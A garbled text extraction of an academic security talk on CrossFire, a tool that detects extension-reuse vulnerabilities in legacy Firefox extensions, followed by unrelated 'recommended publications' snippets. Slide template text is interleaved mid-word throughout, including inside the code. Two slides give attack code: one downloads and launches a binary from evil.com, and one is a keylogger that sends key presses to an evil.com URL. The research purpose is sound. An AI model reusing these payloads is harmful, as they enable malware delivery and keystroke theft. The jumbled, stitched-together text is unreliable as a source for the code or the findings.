Edit Master Text Styles Automated Detection of Firefox Extension

Total Page:16

File Type:pdf, Size:1020Kb

Edit Master Text Styles Automated Detection of Firefox Extension Automated Detection of Firefox Extension- • Click to edit Master textReuse styles Vulnerabilities — Second level • Third level — Fourth level » Fifth level Ahmet S BUYUKKAYHAN William ROBERTSON Who are we? •• Assistant Click to professor edit Master of computer text science styles at Northeastern University— Second in Boston, level MA • Co-directs• Third the level NEU Systems Security Lab with Engin Kirda • Systems,— network, Fourth level and software security researcher • Past winner »of FifthDEFCON level CTF with Shellphish – (a long, long time ago…) 2 Who are we? •• PhD Click Candidate to edit at MasterNortheastern text University styles –— Authored Second peer-reviewed level conference and journal papers in top-tier security• Third venues level • Member —of Fourththe NEU level Systems Security Lab » Fifth level 3 Singapore • Click to edit Master text styles — Second level • Third level — Fourth level » Fifth level 4 Boston • Click to edit Master text styles — Second level • Third level — Fourth level » Fifth level 5 Agenda • Click to edit Master text styles • Background— Second level • Extension-Reuse• Third level Attacks — Fourth level • CrossFire» & Fifth Demo level • Evaluation • Conclusion 6 • Click to edit Master text styles — Second level • Third level — Fourth level » Fifth level Background Browser Extensions • Click to edit Master text styles • Add new capabilities, — Second level customization to browsers • Third level • ~15K extensions in Mozilla — Fourth level Add-ons repository » Fifth level • Popular ones have millions of users • Mostly written in JavaScript 8 Legacy Firefox Extensions •• Shared Click JavaScript to edit Masternamespace text styles –— Extensions Second can read/writelevel objects or variables of others – Can• invoke Third functionality level of others • Shared window — Fourth level XUL XUL XUL – Read/write GUI» Fifthelements level – Listen to all events JavaScript • No privilege separation XPCOM – Full access to filesystem, network… File System Network 9 Threat Model • Click to edit Master text styles • The browser is an attractive target –— Extension Second authors level are untrusted • Vulnerable• Third extensions level can be exploited – “Benign-but-buggy” threat model — Fourth level • Malicious extensions are a real threat » Fifth level – Trick users into installing malicious 161 malicious extensions extensions are blocked – Powerful (“man-in-the-browser” attacks) by Mozilla+ – Easy to develop, difficult to detect + https://addons.mozilla.org/en-US/firefox/blocked/ – Feb 2016 10 Existing Methods for Protection •• Enforcing Click to browser edit Master text styles marketplaces— Second forlevel extensions – Automated• Third analysis level – Human— reviews Fourth level – Extension signing» Fifth level – “Vetting” • Extension isolation – Least privilege and policy-based enforcement 11 Add-on SDK (a.k.a., Jetpack) • Click to edit Master text styles • Introduced in 2009 — Second level October 2014 • Isolates• Third extensions level from each other 12.0% of the top 2,000 • Separate— content Fourth level and core scripts March 2016 • Implements» principle Fifth level of least 22.9% of the top 2,000 privilege Release Date of • But, adoption has been slow WebExtensions in Q3 2016 • Superseded by WebExtensions 12 • Click to edit Master text styles — Second level • Third level — Fourth level » Fifth level Extension-Reuse Attacks Attack Model • Click to edit Master text styles Evil Extension — SecondEvil Extension level (No• ThirdSensitive level Calls) — Fourth level Extension X Extension Y No Suspicious Behavior » Fifth level Sensitive Calls Sensitive Calls Vetting Sandbox Victim`s Browser 14 Impact •• Lack Click of isolation to edit leaves Master legacy text styles extensions— Second defenseless level against capability• Third leaks level • Attackers— can Fourth stitch level together exploits by abusing» Fifth level capabilities • The more power vulnerable extensions have, the easier it is for an evil extension 15 Download & Execute Evil Binary const• ClickWebBrowserPersist to edit= Master text styles Components.Constructor( —"@mozilla.org/embedding/browser/nsWebBrowserPersist;1" Second level , "nsIWebBrowserPersist"); var persist• = ThirdWebBrowserPersist level (); var targetFile—= Fourth level Components.classes» Fifth["@mozilla.org/file/local;1" level ] .createInstance(Components.interfaces.nsILocalFile); targetFile.initWithPath(“evil.bin"); persist.saveURI( “http://evil.com/evil.bin", null, null, null, "", targetFile, null); targetFile.launch(); 16 Extension-reuse Attack Example • Click to edit Master text styles Extension var files = [{ — Second level href: $url, description: "", Download • Third level Execute fname: $path, noRedir: true Extension X — Fourth levelExtension Y }]; » Fifth level gFlashGotService.download(files); var gPrefMan = new GM_PrefManager(); Internet File gPrefMan.setValue(“editor”, $path); System GM_util.openInEditor(); Exe 17 To Reuse or Not To Reuse const• ClickWebBrowserPersist to edit = Master textvar files styles = [{ Components.Constructor("@mozilla.org href: $url, /embedding/browser/nsWebBrowserPersi — Second level description: "", st;1", "nsIWebBrowserPersist"); var persist• = ThirdWebBrowserPersist level (); fname: $path, var targetFile —= Fourth level noRedir: true Components.classes["@mozilla.org/fil }]; e/local;1"].createInstance» Fifth (Componentlevel gFlashGotService.download(files); s.interfaces.nsILocalFile); targetFile.initWithPath($path); var gPrefMan = new GM_PrefManager(); persist.saveURI($url, null, null, gPrefMan.setValue(“editor”, $path); null, "", targetFile, null); GM_util.openInEditor(); targetFile.launch(); 18 Another Example •• A Clickkey logger, to edit which Master sends each text key styles press to evil.com gd12.dicInline.urlWikPrefix— Second level = "http://evil.com/GD12_YOUR_LANG/steal.php?key="; gd12.keydownHandler = function(e) { gd12.dicInline.lookupWikt(String.fromCharCode(e.which),• Third level false, false); }; — Fourth level gd12.init(); » Fifth level Evil.com Internet 19 • Click to edit Master text styles — Second level • Third level — Fourth level » Fifth level CrossFire CrossFire Overview • Click to edit Master text styles — Second level • Third level — Fourth level » Fifth level 21 DEMO • Click to edit Master text styles — Second level • Third level — Fourth level » Fifth level 22 • Click to edit Master text styles — Second level • Third level — Fourth level » Fifth level Evaluation Method •• Top Click 10 most to editdownloaded Master extensions text styles –— Manual Second analysis level on all set • Top 2000• Third most level downloaded extensions – Manual— analysis Fourth levelon random set of 323 • Case Study» Fifth level – Developed an extension with cross- extension function call – Applied to full review 24 Top 10 Firefox Extensions •Extension Click Name to edit Automated Master Exploits text Manual Exploitsstyles False Positives # of Users Adblock Plus 0 0 4 22 M Video— DownloadHelper Second 0level 15 0 6.5 M Firebug• Third level 0 1 0 3 M NoScript— Fourth 2 level 5 2 2.5 M DownThemAll!» Fifth 0 level 5 0 1.5 M Greasemonkey 1 3 2 1.5 M Web of Trust 1 33 15 1.3 M Flash Video Down. 4 1 1 1.3 M FlashGot Mass Down. 3 5 9 1.3 M Down. YouTube Videos 0 2 1 1 M 25 Summary of Results •Detected Click Vulnerabilities to edit – Random Master Set text Positivestyles Vulnerabilities by Attack Type —True Second Positives Falselevel Positives Manual Automated • Third level —96 Fourth level 51 20% 27% » Fifth level 255 204 73% 80% 26 Breakdown of Positive Vulnerabilities • Click to edit Master text stylesCategory Description Positive Vulnerabilities By Category File I/O Code Execution Execute binary or JS — Second16% level Event Listener Registration • Third level File I/O Read from/write to 12% Filesystem — Fourth level Network Access Open a URI or download a Preference file Access » Fifth level Preference Access Read/write browser 3% settings Code Execution Event Listener Reg. Key logging events only 3% Network Access 66% 27 Performance •• Fast Click static to analysis edit Master text styles –— ~ 1 Second sec average level (per extension) Min• Third Q1 level Median Mean Q3 Max 0.05s— Fourth 0.18s level 0.28s 1.06s 0.51s 763.91s » Fifth level • Fast exploit generation – ~ 380 secs (~ 6 mins) on average (per exploit) Min Q1 Median Mean Q3 Max 30s 192s 270s 378.6s 550.8 2160s 28 Case Study •• ValidateThisWebSite Click to edit Master text styles –— ~50 Second lines of code level – No• obfuscation Third level or attempt to hide — Fourth level – Opens unnecessary » Fifth level harmless link // Attacker chooses $url noscriptBM.placesUtils.__ns.__global__.ns. loadErrorPage(window[1], $url); 29 Limitations •• CrossFire Click to is editnot a Mastersound and text precise styles analysis tool — Second level • CrossFire• Third does level not handle – Inferring— dynamic Fourth level types – Prototype-based» Fifth inheritance level – String evaluation 30 Mitigation & Detection •• Isolation Click to edit Master text styles • Least— Second privilege level • Secure• Thirdfunctionality level and data sharing • Check for— extension-reuse Fourth level vulnerabilities » Fifth level • Mozilla security team is informed 31 Key Takeaways • Click to edit Master text styles • Lack of isolation allows stealthy attacks — Second level • Attackers can easily automate • Third level • More robust— Fourth isolation, level vetting, and analysis required » Fifth level 32 Thank You • Click to edit Master text styles — Second level • Third level — Fourth level » Fifth level 33.
Recommended publications
  • The Javascript Revolution
    Top teams present at Segfault Tank on 4/21: 1 Duel: 6 (2 extra shifted from self votes) 2 Ambassador: 4 3 QuickSource: 3 4 ChalkBoard: 3 5 Fortuna Beer: 3 Bottom teams present in class this Thursday 4/16: 1 Scribble: 2 2 ClearViz: 2 3 AllInOne: 1 4 TripSplitter: 0 Shockers: Scribble & Fortuna Congrats on sneaky strategizing to get yourself to the top :) The moment of fruit: the class has spoken Shockers: Scribble & Fortuna Congrats on sneaky strategizing to get yourself to the top :) The moment of fruit: the class has spoken Top teams present at Segfault Tank on 4/21: 1 Duel: 6 (2 extra shifted from self votes) 2 Ambassador: 4 3 QuickSource: 3 4 ChalkBoard: 3 5 Fortuna Beer: 3 Bottom teams present in class this Thursday 4/16: 1 Scribble: 2 2 ClearViz: 2 3 AllInOne: 1 4 TripSplitter: 0 Congrats on sneaky strategizing to get yourself to the top :) The moment of fruit: the class has spoken Top teams present at Segfault Tank on 4/21: 1 Duel: 6 (2 extra shifted from self votes) 2 Ambassador: 4 3 QuickSource: 3 4 ChalkBoard: 3 5 Fortuna Beer: 3 Bottom teams present in class this Thursday 4/16: 1 Scribble: 2 2 ClearViz: 2 3 AllInOne: 1 4 TripSplitter: 0 Shockers: Scribble & Fortuna The moment of fruit: the class has spoken Top teams present at Segfault Tank on 4/21: 1 Duel: 6 (2 extra shifted from self votes) 2 Ambassador: 4 3 QuickSource: 3 4 ChalkBoard: 3 5 Fortuna Beer: 3 Bottom teams present in class this Thursday 4/16: 1 Scribble: 2 2 ClearViz: 2 3 AllInOne: 1 4 TripSplitter: 0 Shockers: Scribble & Fortuna Congrats on sneaky strategizing
    [Show full text]
  • 18 Free Ways to Download Any Video Off the Internet Posted on October 2, 2007 by Aseem Kishore Ads by Google
    http://www.makeuseof.com/tag/18-free-ways-to-download-any-video-off-the-internet/ 18 Free Ways To Download Any Video off the Internet posted on October 2, 2007 by Aseem Kishore Ads by Google Download Videos Now download.cnet.com Get RealPlayer® & Download Videos from the web. 100% Secure Download. Full Movies For Free www.YouTube.com/BoxOffice Watch Full Length Movies on YouTube Box Office. Absolutely Free! HD Video Players from US www.20north.com/ Coby, TV, WD live, TiVo and more. Shipped from US to India Video Downloading www.VideoScavenger.com 100s of Video Clips with 1 Toolbar. Download Video Scavenger Today! It seems like everyone these days is downloading, watching, and sharing videos from video-sharing sites like YouTube, Google Video, MetaCafe, DailyMotion, Veoh, Break, and a ton of other similar sites. Whether you want to watch the video on your iPod while working out, insert it into a PowerPoint presentation to add some spice, or simply download a video before it’s removed, it’s quite essential to know how to download, convert, and play these videos. There are basically two ways to download videos off the Internet and that’s how I’ll split up this post: either via a web app or via a desktop application. Personally, I like the web applications better simply because you don’t have to clutter up and slow down your computer with all kinds of software! UPDATE: MakeUseOf put together an excellent list of the best websites for watching movies, TV shows, documentaries and standups online.
    [Show full text]
  • Volume 51 April, 2011
    Volume 51 April, 2011 e17: Create Your Own Custom Themes e17: Running Ecomorph, Part 2: Settings e17: Tips & Tricks Video: Part 3 ­ Converting Files With MyMencoder Video: Part 4 ­ MyMencoderDVD Removing A Logo With Avidemux Using Scribus, Part 4: Layers Game Zone: Pipewalker Plus Rudge's Rain: Making Music More With PCLinuxOS Inside! WindowMaker on PCLinuxOS: Working With Icons Burning CDs Over The Internet With Or Without An ISO Alternate OS: Icaros, Part 2 Firefox Add­on: Video DownloadHelper Learning rtmpdump Through Examples TTaabbllee OOff CCoonntteennttss by Paul Arnote (parnote) 3 Welcome From The Chief Editor 4 e17: Running Ecomorph, Part 2 ­ Settings The holidays have finally come and gone, the 6 Using Scribus, Part 4: Layers packages have all been unwrapped, the Christmas tree and other holiday decorations are coming down, 7 Screenshot Showcase and a new year is upon us. Texstar and the The PCLinuxOS name, logo and colors are the trademark of 8 Video: Part 3 ­ Converting Files With MyMencoder PTCexLsitnaru. xOS Packaging Crew are busy putting the 12 ms_meme's Nook: Top Of My Desktop new tool chain to good use, working on getting the PTChLeiNnEuWxOPSCL2in0u1x0OSreMleagaaszeinneeisaaremrotnothclyoomnlpinle tion. The 13 Double Take & Mark's Quick Gimp Tip upudbalicteatsiocnocnontitnaiuneingtoPCroLlilnuoxuOtSa­rtealanteadmmatzeirniagls.pIat icse, with 14 e17: Create Your Own Custom Themes litpeurbalisllhyehdupnrimdraeridlysfoorfmneemwbearsnodf tuhpedPaCtLeindupxOaSckages community. The Magazine staff is comprised of volunteers 20 Screenshot Showcase bferocmomtheinPgCaLvinauixlOabSlecoemvmeurnyityw. eek. 21 Video: Part 4 ­ MyMencoderDVD TVhisisit musoonntlihne'samt hattgp:a//zwiwnwe.pccolovsemrafge.caotmures snow covered 25 Screenshot Showcase photos from ms_meme. On the inside, the contents This release was made possible by the following volunteers: 26 Alternate OS: Icaros, Part 2 are hot enough to melt that snow.
    [Show full text]
  • Video Downloadhelper Download and Convert to Destination Video Downloadhelper Download and Convert to Destination
    video downloadhelper download and convert to destination Video downloadhelper download and convert to destination. Go to the official Video DownloadHelper page on the Chrome Web Store and click the Add to Chrome button. If you are of an adventurous temper, you may want to use some features before before they are made available for everyone. You can install early releases from the Video DownloadHelper development forum. How to verify Video DownloadHelper is working. Go to this page and start the video. You should see in the Firefox browser toolbar an colored 3-balls icon. The fact the icon is colored indicates there are videos to be downloaded. The number in the small green box shows how many variants of the video are available to choose from. Click on the icon to open the main panel. As everywhere else in Chrome, clicking outside the panel will close it. Click the item in the list. A File Save dialog opens to give you an opportunity to change the name of the file and/or the target folder. Confirm and your file will be soon be on your disk. How to use the companion button. Sorry, there is no companion button on the Chrome version. How to download a video quickly. If you want to skip the file saving dialog and save with the default name to the default directory, click on the 3-dots sign at the right of an item, this opens the list of actions. Check the parameter Use this action as default then click Quick Download . The file will start downloading immediately.
    [Show full text]
  • Asus Eee PC for Dummies
    Index journal, 101 • Symbols and Numerics • KCalc, 100 > (greater than), redirecting output, 311 KNotes, 105 >> (greater thans), appending to a fi le, 311 Kontact, 100–101 | (vertical bar), directing output to KSnapshot, 102–103 another command, 311–312 PIM (Personal Information Manager), 2G Surf, 14 100–101 4G, 14–15 PIM icon, 99 4G Surf, 14–15 pop-up notes, 101, 105 701SD, 15 Screen Capture icon, 99 900 series, 15–18 to-do list, 101 901 and Beyond icon, 6 Accessories icon, 92, 99 1000 series, 18–19 account name, personalizing, 149 Acrobat Reader, 184. See also PDF readers Acronis True Image, 284 • A • Ad-Aware Free, 231 Adblock Plus, 60 AbiWord, 219–220 add-ons accessories, hardware. See also Firefox, 59–60 personalization Thunderbird, 95–96 Bluetooth, 254–255 Add/Remove Software, 163. See also carrying case, 249–251 installing; uninstalling case graphics, 255–256 Add/Remove Software icon, 147, 163 GPS (Global Positioning System), 259–261 address books, Thunderbird, 96. See also keyboards, 252–253 contact lists mice, 251–252 administrative privileges, 309 modems, 256–257 Advanced Mode, 295–301. See also monitors, 257–259 Easy Mode projectors, 257–259 Advanced Packaging Tool (APT), 204–205 skins (themes), 255–256 advertisements, blocking, 60 USB powered work light, 254 adware, 231 accessories, software. See also AIM, 65 personalization COPYRIGHTEDAll About MATERIAL Eee, 343 accessing, 99 Amarok music player/organizer, 139–140 Calculator, 100 Amazon, 22 Calculator icon, 99 Andreesen, Marc, 58 calendar, 101 Andrew K’s XP Games, 228 capturing
    [Show full text]
  • Firefox Streaming Video Downloader
    Firefox streaming video downloader click here to download Download Video DownloadHelper for Firefox. Whenever a site uses a non- supported streaming technology, Video DownloadHelper is also. Download Ant Video Downloader for Firefox. Browser extension with a separate application for downloading and merging streaming video. Most popular and ONLY ☆ Video Downloader that downloads most of the Streaming Videos, YouTube 4K and Full HD. Flash Video Downloader helps you to. The following tools, in combination with your Firefox browser, can not only help Use Flash Video Downloader to download streaming videos. Easy YouTube Video Downloader is best, very fast and instant downloading Firefox extension, especially for YouTube videos. It supports video downloading in. Sometimes, you just don't feel like waiting for a video to stream. Though the Flash Video Downloader extension (Chrome, Firefox) probably. List of best Firefox add-ons for web development, security, image and videos, a single master password to access other online services like online banking, . Whether you want to convert video, download video or mp3, or play video or mp3 . WARNING: Downloading streaming videos is not illegal, as long as you use the To download videos (including YouTube) using Firefox, we. Addon for Mozilla Firefox to download videos from video websites. This is a group of addons which help firefox users download online videos hosted on video sites like Youtube, Metacafe, Myspace, .. and others. Improved FlashGot Options|FlashGot Media panel, to choose a distinct download manager for streaming media capture. Firefox's built-in download manager is. I just use Video Download helper for firefox. Note that it is not guaranteed that any streaming video would be saved in your cache folder.
    [Show full text]
  • How to Download Flash Videos Firefox
    How to download flash videos firefox Download Flash and Video is a great download helper tool that lets you download Flash games and Flash videos (YouTube, Facebook, ​Download Flash and Video · ​ user reviews · ​Versions. Flash Video Downloader - YouTube HD Download [4K] Flash Video Downloader helps you find links to videos, pictures, audio and. Download all the links, movies and audio clips of a page at the maximum speed with a single click, using the most Supported download tools are dozens, see for details. Download Management · Photos, Music & Videos ​ user reviews · ​Versions · ​Developer:: Add. The easy way to download and convert Web videos from hundreds of Video DownloadHelper is the most complete tool to extract videos and. Many websites require the Adobe Flash Player plugin to display videos and games. Learn how to install the Flash Go to Adobe's Flash Player download page. Issues with Flash, which YouTube uses to play videos, may cause Read More. It is not even Download Flash Files Using Firefox. Launch Firefox and load to. This short video will show you how to download any flash video including youtube videos using a free. Install DownloadHelper in Firefox. One of the easiest ways to download YouTube videos is with the. check You can also install and use a Firefox add-on like FlashGot (see resources) to download Flash and other types of files to your hard drive. I wanted to download some quilting videos from YouTube so that I always had them available whenever I needed to remind myself how to do a. Also Orbit Downloader can help you to download flash videos and clips from many video sharing websites like YouTube, Metacafe, Dailymotion, Myspace.
    [Show full text]
  • Browser Extension to Download Videos from the Web Best Google Chrome Video Downloader Extensions
    browser extension to download videos from the web Best Google Chrome Video Downloader Extensions. Videos are an integral part of the web, they make the content more palatable and appealing. When you search the web, you encounter a number of videos and many times you wish to download the media file. Downloading the embedded video files is very difficult as they are encrypted with high security. There are a number of online websites which claim to assist in downloading the video files from any web page. Also, there are a number of chrome extensions which claim to download videos from all the popular web pages for free. Most of the sites do not support video download from there platform nor do they support any of the services which let download the video file. But there are a number of video downloader chrome extensions which help you get the embedded videos from many popular sites for free without any complications. Today in this post I have come up with some of the best Video Downloader Chrome Extensions to save the content offline. The Chrome extensions are a great utility tool which assists and enhance in Chrome productivity. So, without much delay let us look at some of the best Chrome Extensions to Download Videos from any Webpage. Note: We do not endorse the software nor are we affiliated to it in any form. Use the apps are your own discretion. Please note that DigitBin isn’t responsible for media content which you download. Best Video Downloader Chrome Extensions. Here are the Best Video Downloader Chrome Extensions to Save Video Files from all the Sites and Web Pages.
    [Show full text]
  • GAP4APE: a Client-Side System to Enhance Accessibility in the Web 2.0 Era
    GAP4APE: a client-side system to enhance accessibility in the Web 2.0 era Silvia Mirri Paola Salomoni Department of Computer Science Department of Computer Science University of Bologna University of Bologna Via Mura Anteo Zamboni 7 Via Mura Anteo Zamboni 7 40127 Bologna (BO), Italy 40127 Bologna (BO), Italy [email protected] [email protected] Giorgia Cucchiarini Corso di Laurea in Scienze dell’Informazione University of Bologna Via Sacchi, 3 47521 Cesena (FC), Italy [email protected] ABSTRACT (AbilityNet 2008) and are not compliant with any national regulation or W3C guidelines (W3C 2008). This accessibility Social networking systems have radically changed personal issue is quite common in most of Web 2.0 services, which communication by providing new and interesting are strongly based on smart interfaces implemented with a opportunities both in leisure and in business. Despite their wide use of AJAX scripts (Garrett 2005). Social networks, apparent universal appeal, these systems are effectively and more specifically Facebook, support users’ leaving out a part of users with disabilities, who have customization as the possibility of changing few layout difficulties in register, join and participate in the main on-line characteristics, such as color background or text size. These communities. Facebook represents a critical case: beside modifications are bound to the user profile page only and some accessibility improvement provided by this social they have to be manually specified by the user without any network service, its accessibility represents an issue yet. This support by some profiling tool. paper presents an augmented browsing system, which allows users with disabilities to specify their needs and preferences In this paper we present GAP4APE (GreaseMonkey And about Web pages presentation, directly by means of the Profiling for Accessible Pages Enhancement), a system to browser interface.
    [Show full text]
  • Ubuntuguide Part2
    UbuntuGuide Part2 - http://ubuntuguide.org/index.php?title=UbuntuGuide_Part2&... UbuntuGuide Part2 From Contents 1 Boot from a Live CD 2 UEFI 3 Coreboot 4 Multiple OS Installation 4.1 Introduction 4.1.1 Using Grub Legacy for the boot partition 4.2 Partition design 4.3 Windows partitions 4.3.1 Changing Windows partition sizes 4.3.1.1 Using Shrink Volume on Vista and Windows 7 4.3.1.2 Reinstalling Vista or Windows 7 on a new partition 4.3.1.2.1 Using Windows Recovery Disks 4.3.1.3 Windows XP (or earlier) 4.3.1.4 Windows bootloaders 4.4 Install your first Linux OS 4.5 Copy boot files to the small Grub partition 4.6 Reinstall Grub to MBR 4.7 Install your second Linux OS 4.8 Changing main Grub boot menu settings 4.8.1 Using UUIDs for the main Grub bootloader menu 4.8.2 Add MacOSX entry 4.9 Re-installing Grub Legacy after Windows upgrade or re-installation 4.10 Other chainloader options 4.10.1 Chainloading Grub2 from Grub Legacy 4.11 The (hd0,9) problem 4.12 Protecting Grub Legacy from cracking 4.13 Manipulating partitions on the hard drive 5 Manipulating Partitions 5.1 Use the (K)Ubuntu Desktop LiveCD 5.2 Use GParted to manage partitions 5.3 One linux-swap partition per computer 5.4 Creating and "moving" free space 5.5 Creating or resizing a partition 5.6 Changing Grub Legacy in a boot partition 5.7 Changing Grub2 in a changed partition 5.7.1 Booting (K)Ubuntu manually from Grub Legacy 5.7.2 Discovering the current kernel files manually 5.8 Changing Grub Legacy in a changed partition 6 Virtualbox in Windows 6.1 Install Virtualbox in Windows 6.2 Install Ubuntu edition for virtual machines 6.2.1 Install a desktop 6.2.2 Install Linux Guest Additions 6.2.3 Creating shared folders 7 Android emulation 7.1 Android-x86 in VirtualBox 7.1.1 Networking for Android-x86 7.1.1.1 Wired networking for Android-x86 RC 4.0RC1 7.1.2 Installing apps 7.1.2.1 Modified apps 7.1.3 Usage tips 7.2 Android SDK emulator 7.2.1 Networking for Android SDK 7.2.2 Installing an app 1 of 177 08/10/2013 09:04 AM UbuntuGuide Part2 - http://ubuntuguide.org/index.php?title=UbuntuGuide_Part2&..
    [Show full text]
  • Automated Malware Analysis Report For
    ID: 193539 Sample Name: VdhCoAppSetup-1.3.0.exe Cookbook: default.jbs Time: 01:37:16 Date: 04/12/2019 Version: 28.0.0 Lapis Lazuli Table of Contents Table of Contents 2 Analysis Report VdhCoAppSetup-1.3.0.exe 4 Overview 4 General Information 4 Detection 4 Confidence 4 Classification 5 Analysis Advice 5 Mitre Att&ck Matrix 6 Signature Overview 6 Cryptography: 6 Spreading: 6 Networking: 6 Key, Mouse, Clipboard, Microphone and Screen Capturing: 7 System Summary: 7 Data Obfuscation: 7 Persistence and Installation Behavior: 7 Hooking and other Techniques for Hiding and Protection: 7 Malware Analysis System Evasion: 8 Anti Debugging: 8 HIPS / PFW / Operating System Protection Evasion: 8 Language, Device and Operating System Detection: 8 Behavior Graph 8 Simulations 9 Behavior and APIs 9 Antivirus, Machine Learning and Genetic Malware Detection 9 Initial Sample 9 Dropped Files 9 Unpacked PE Files 9 Domains 10 URLs 10 Yara Overview 10 Initial Sample 10 PCAP (Network Traffic) 10 Dropped Files 10 Memory Dumps 10 Unpacked PEs 10 Sigma Overview 10 Joe Sandbox View / Context 11 IPs 11 Domains 11 ASN 11 JA3 Fingerprints 11 Dropped Files 11 Screenshots 11 Thumbnails 11 Startup 12 Created / dropped Files 12 Domains and IPs 15 Contacted Domains 15 URLs from Memory and Binaries 15 Contacted IPs 17 Static File Info 17 General 17 File Icon 17 Static PE Info 18 General 18 Authenticode Signature 18 Entrypoint Preview 18 Copyright Joe Security LLC 2019 Page 2 of 53 Data Directories 19 Sections 19 Resources 20 Imports 20 Version Infos 20 Possible Origin 21 Network
    [Show full text]
  • TUTTO STREAMING Il Migliori E Aggiornati Trucchi
    TUTTO STREAMING Il migliori e aggiornati trucchi Stanco dei blocchi o delle continue pause dovute al buffering mentre guardo in streaming video sulla rete, che sia in youtube, megavideo, o qualunque altro cazzo di sito streaming. Il buffer è una rottura e dipende da diverse cose quindi nn per tutti è uguale, anche se fondamentalmente la principale causa è la connessione quindi potrebbe dipendere dal router o modem, in alcuni casi cambiando il router infatti il problema è sparito. Ma per non passare a misure drastiche possiamo provare tutti i trucchi a disposizione... * * * Risorse gratuite per aggirare i blocchi di Megavideo e compagni ✔ MegaVideoNoTimeLimit – (Annullare il limite di 72 minuti e scaricare gratis film da MegaVideo) ✔ Megavideo Bypass – (Guardare MegaVideo senza limiti) ✔ VideoURLs – (Vedere MegaVideo senza limiti gratis) ✔ MegaVideo Bypasser Limit - (Annullare il limite di 72 minuti in MegaVideo) ✔ MegaStreaming – (Visualizzare MegaVideo senza limiti) ✔ MegaUPremium - (un generatore di account premium per Megaupload, Megavideo, e altri) Add-ons ✔ illimitux – (MegaVideo senza limiti gratis con add-on per Firefox o utility da scaricare) ✔ Cacaoweb (Come Illimitux è un add-on sperimentale per rimuovere i limiti MegaVideo) ✗ DetectVideo – (Altro famoso quanto obsoledo add-on per rimuovere i limiti MegaVideo gratis) Ed ecco altri add-ons per il download & streaming generale con firefox da diversi servizi. In particolare gli add-on di firefox più comuni ed usati: ➢ DownloadHelper - (Scarica filmati interi da Megavideo e altri) ➢ ConvertHelper - (Converte i filmati in download nei formati voluti come DivX, ecc..) E' da chiarirsi che ogni pro a i suoi contro purtroppo in quanto gli amministratori di siti come Megavideo e compagni, correggono continuamente le scappatoie per cercare di farci pagare i loro servizi, ed ogni volta dobbiamo trovarne di nuove.
    [Show full text]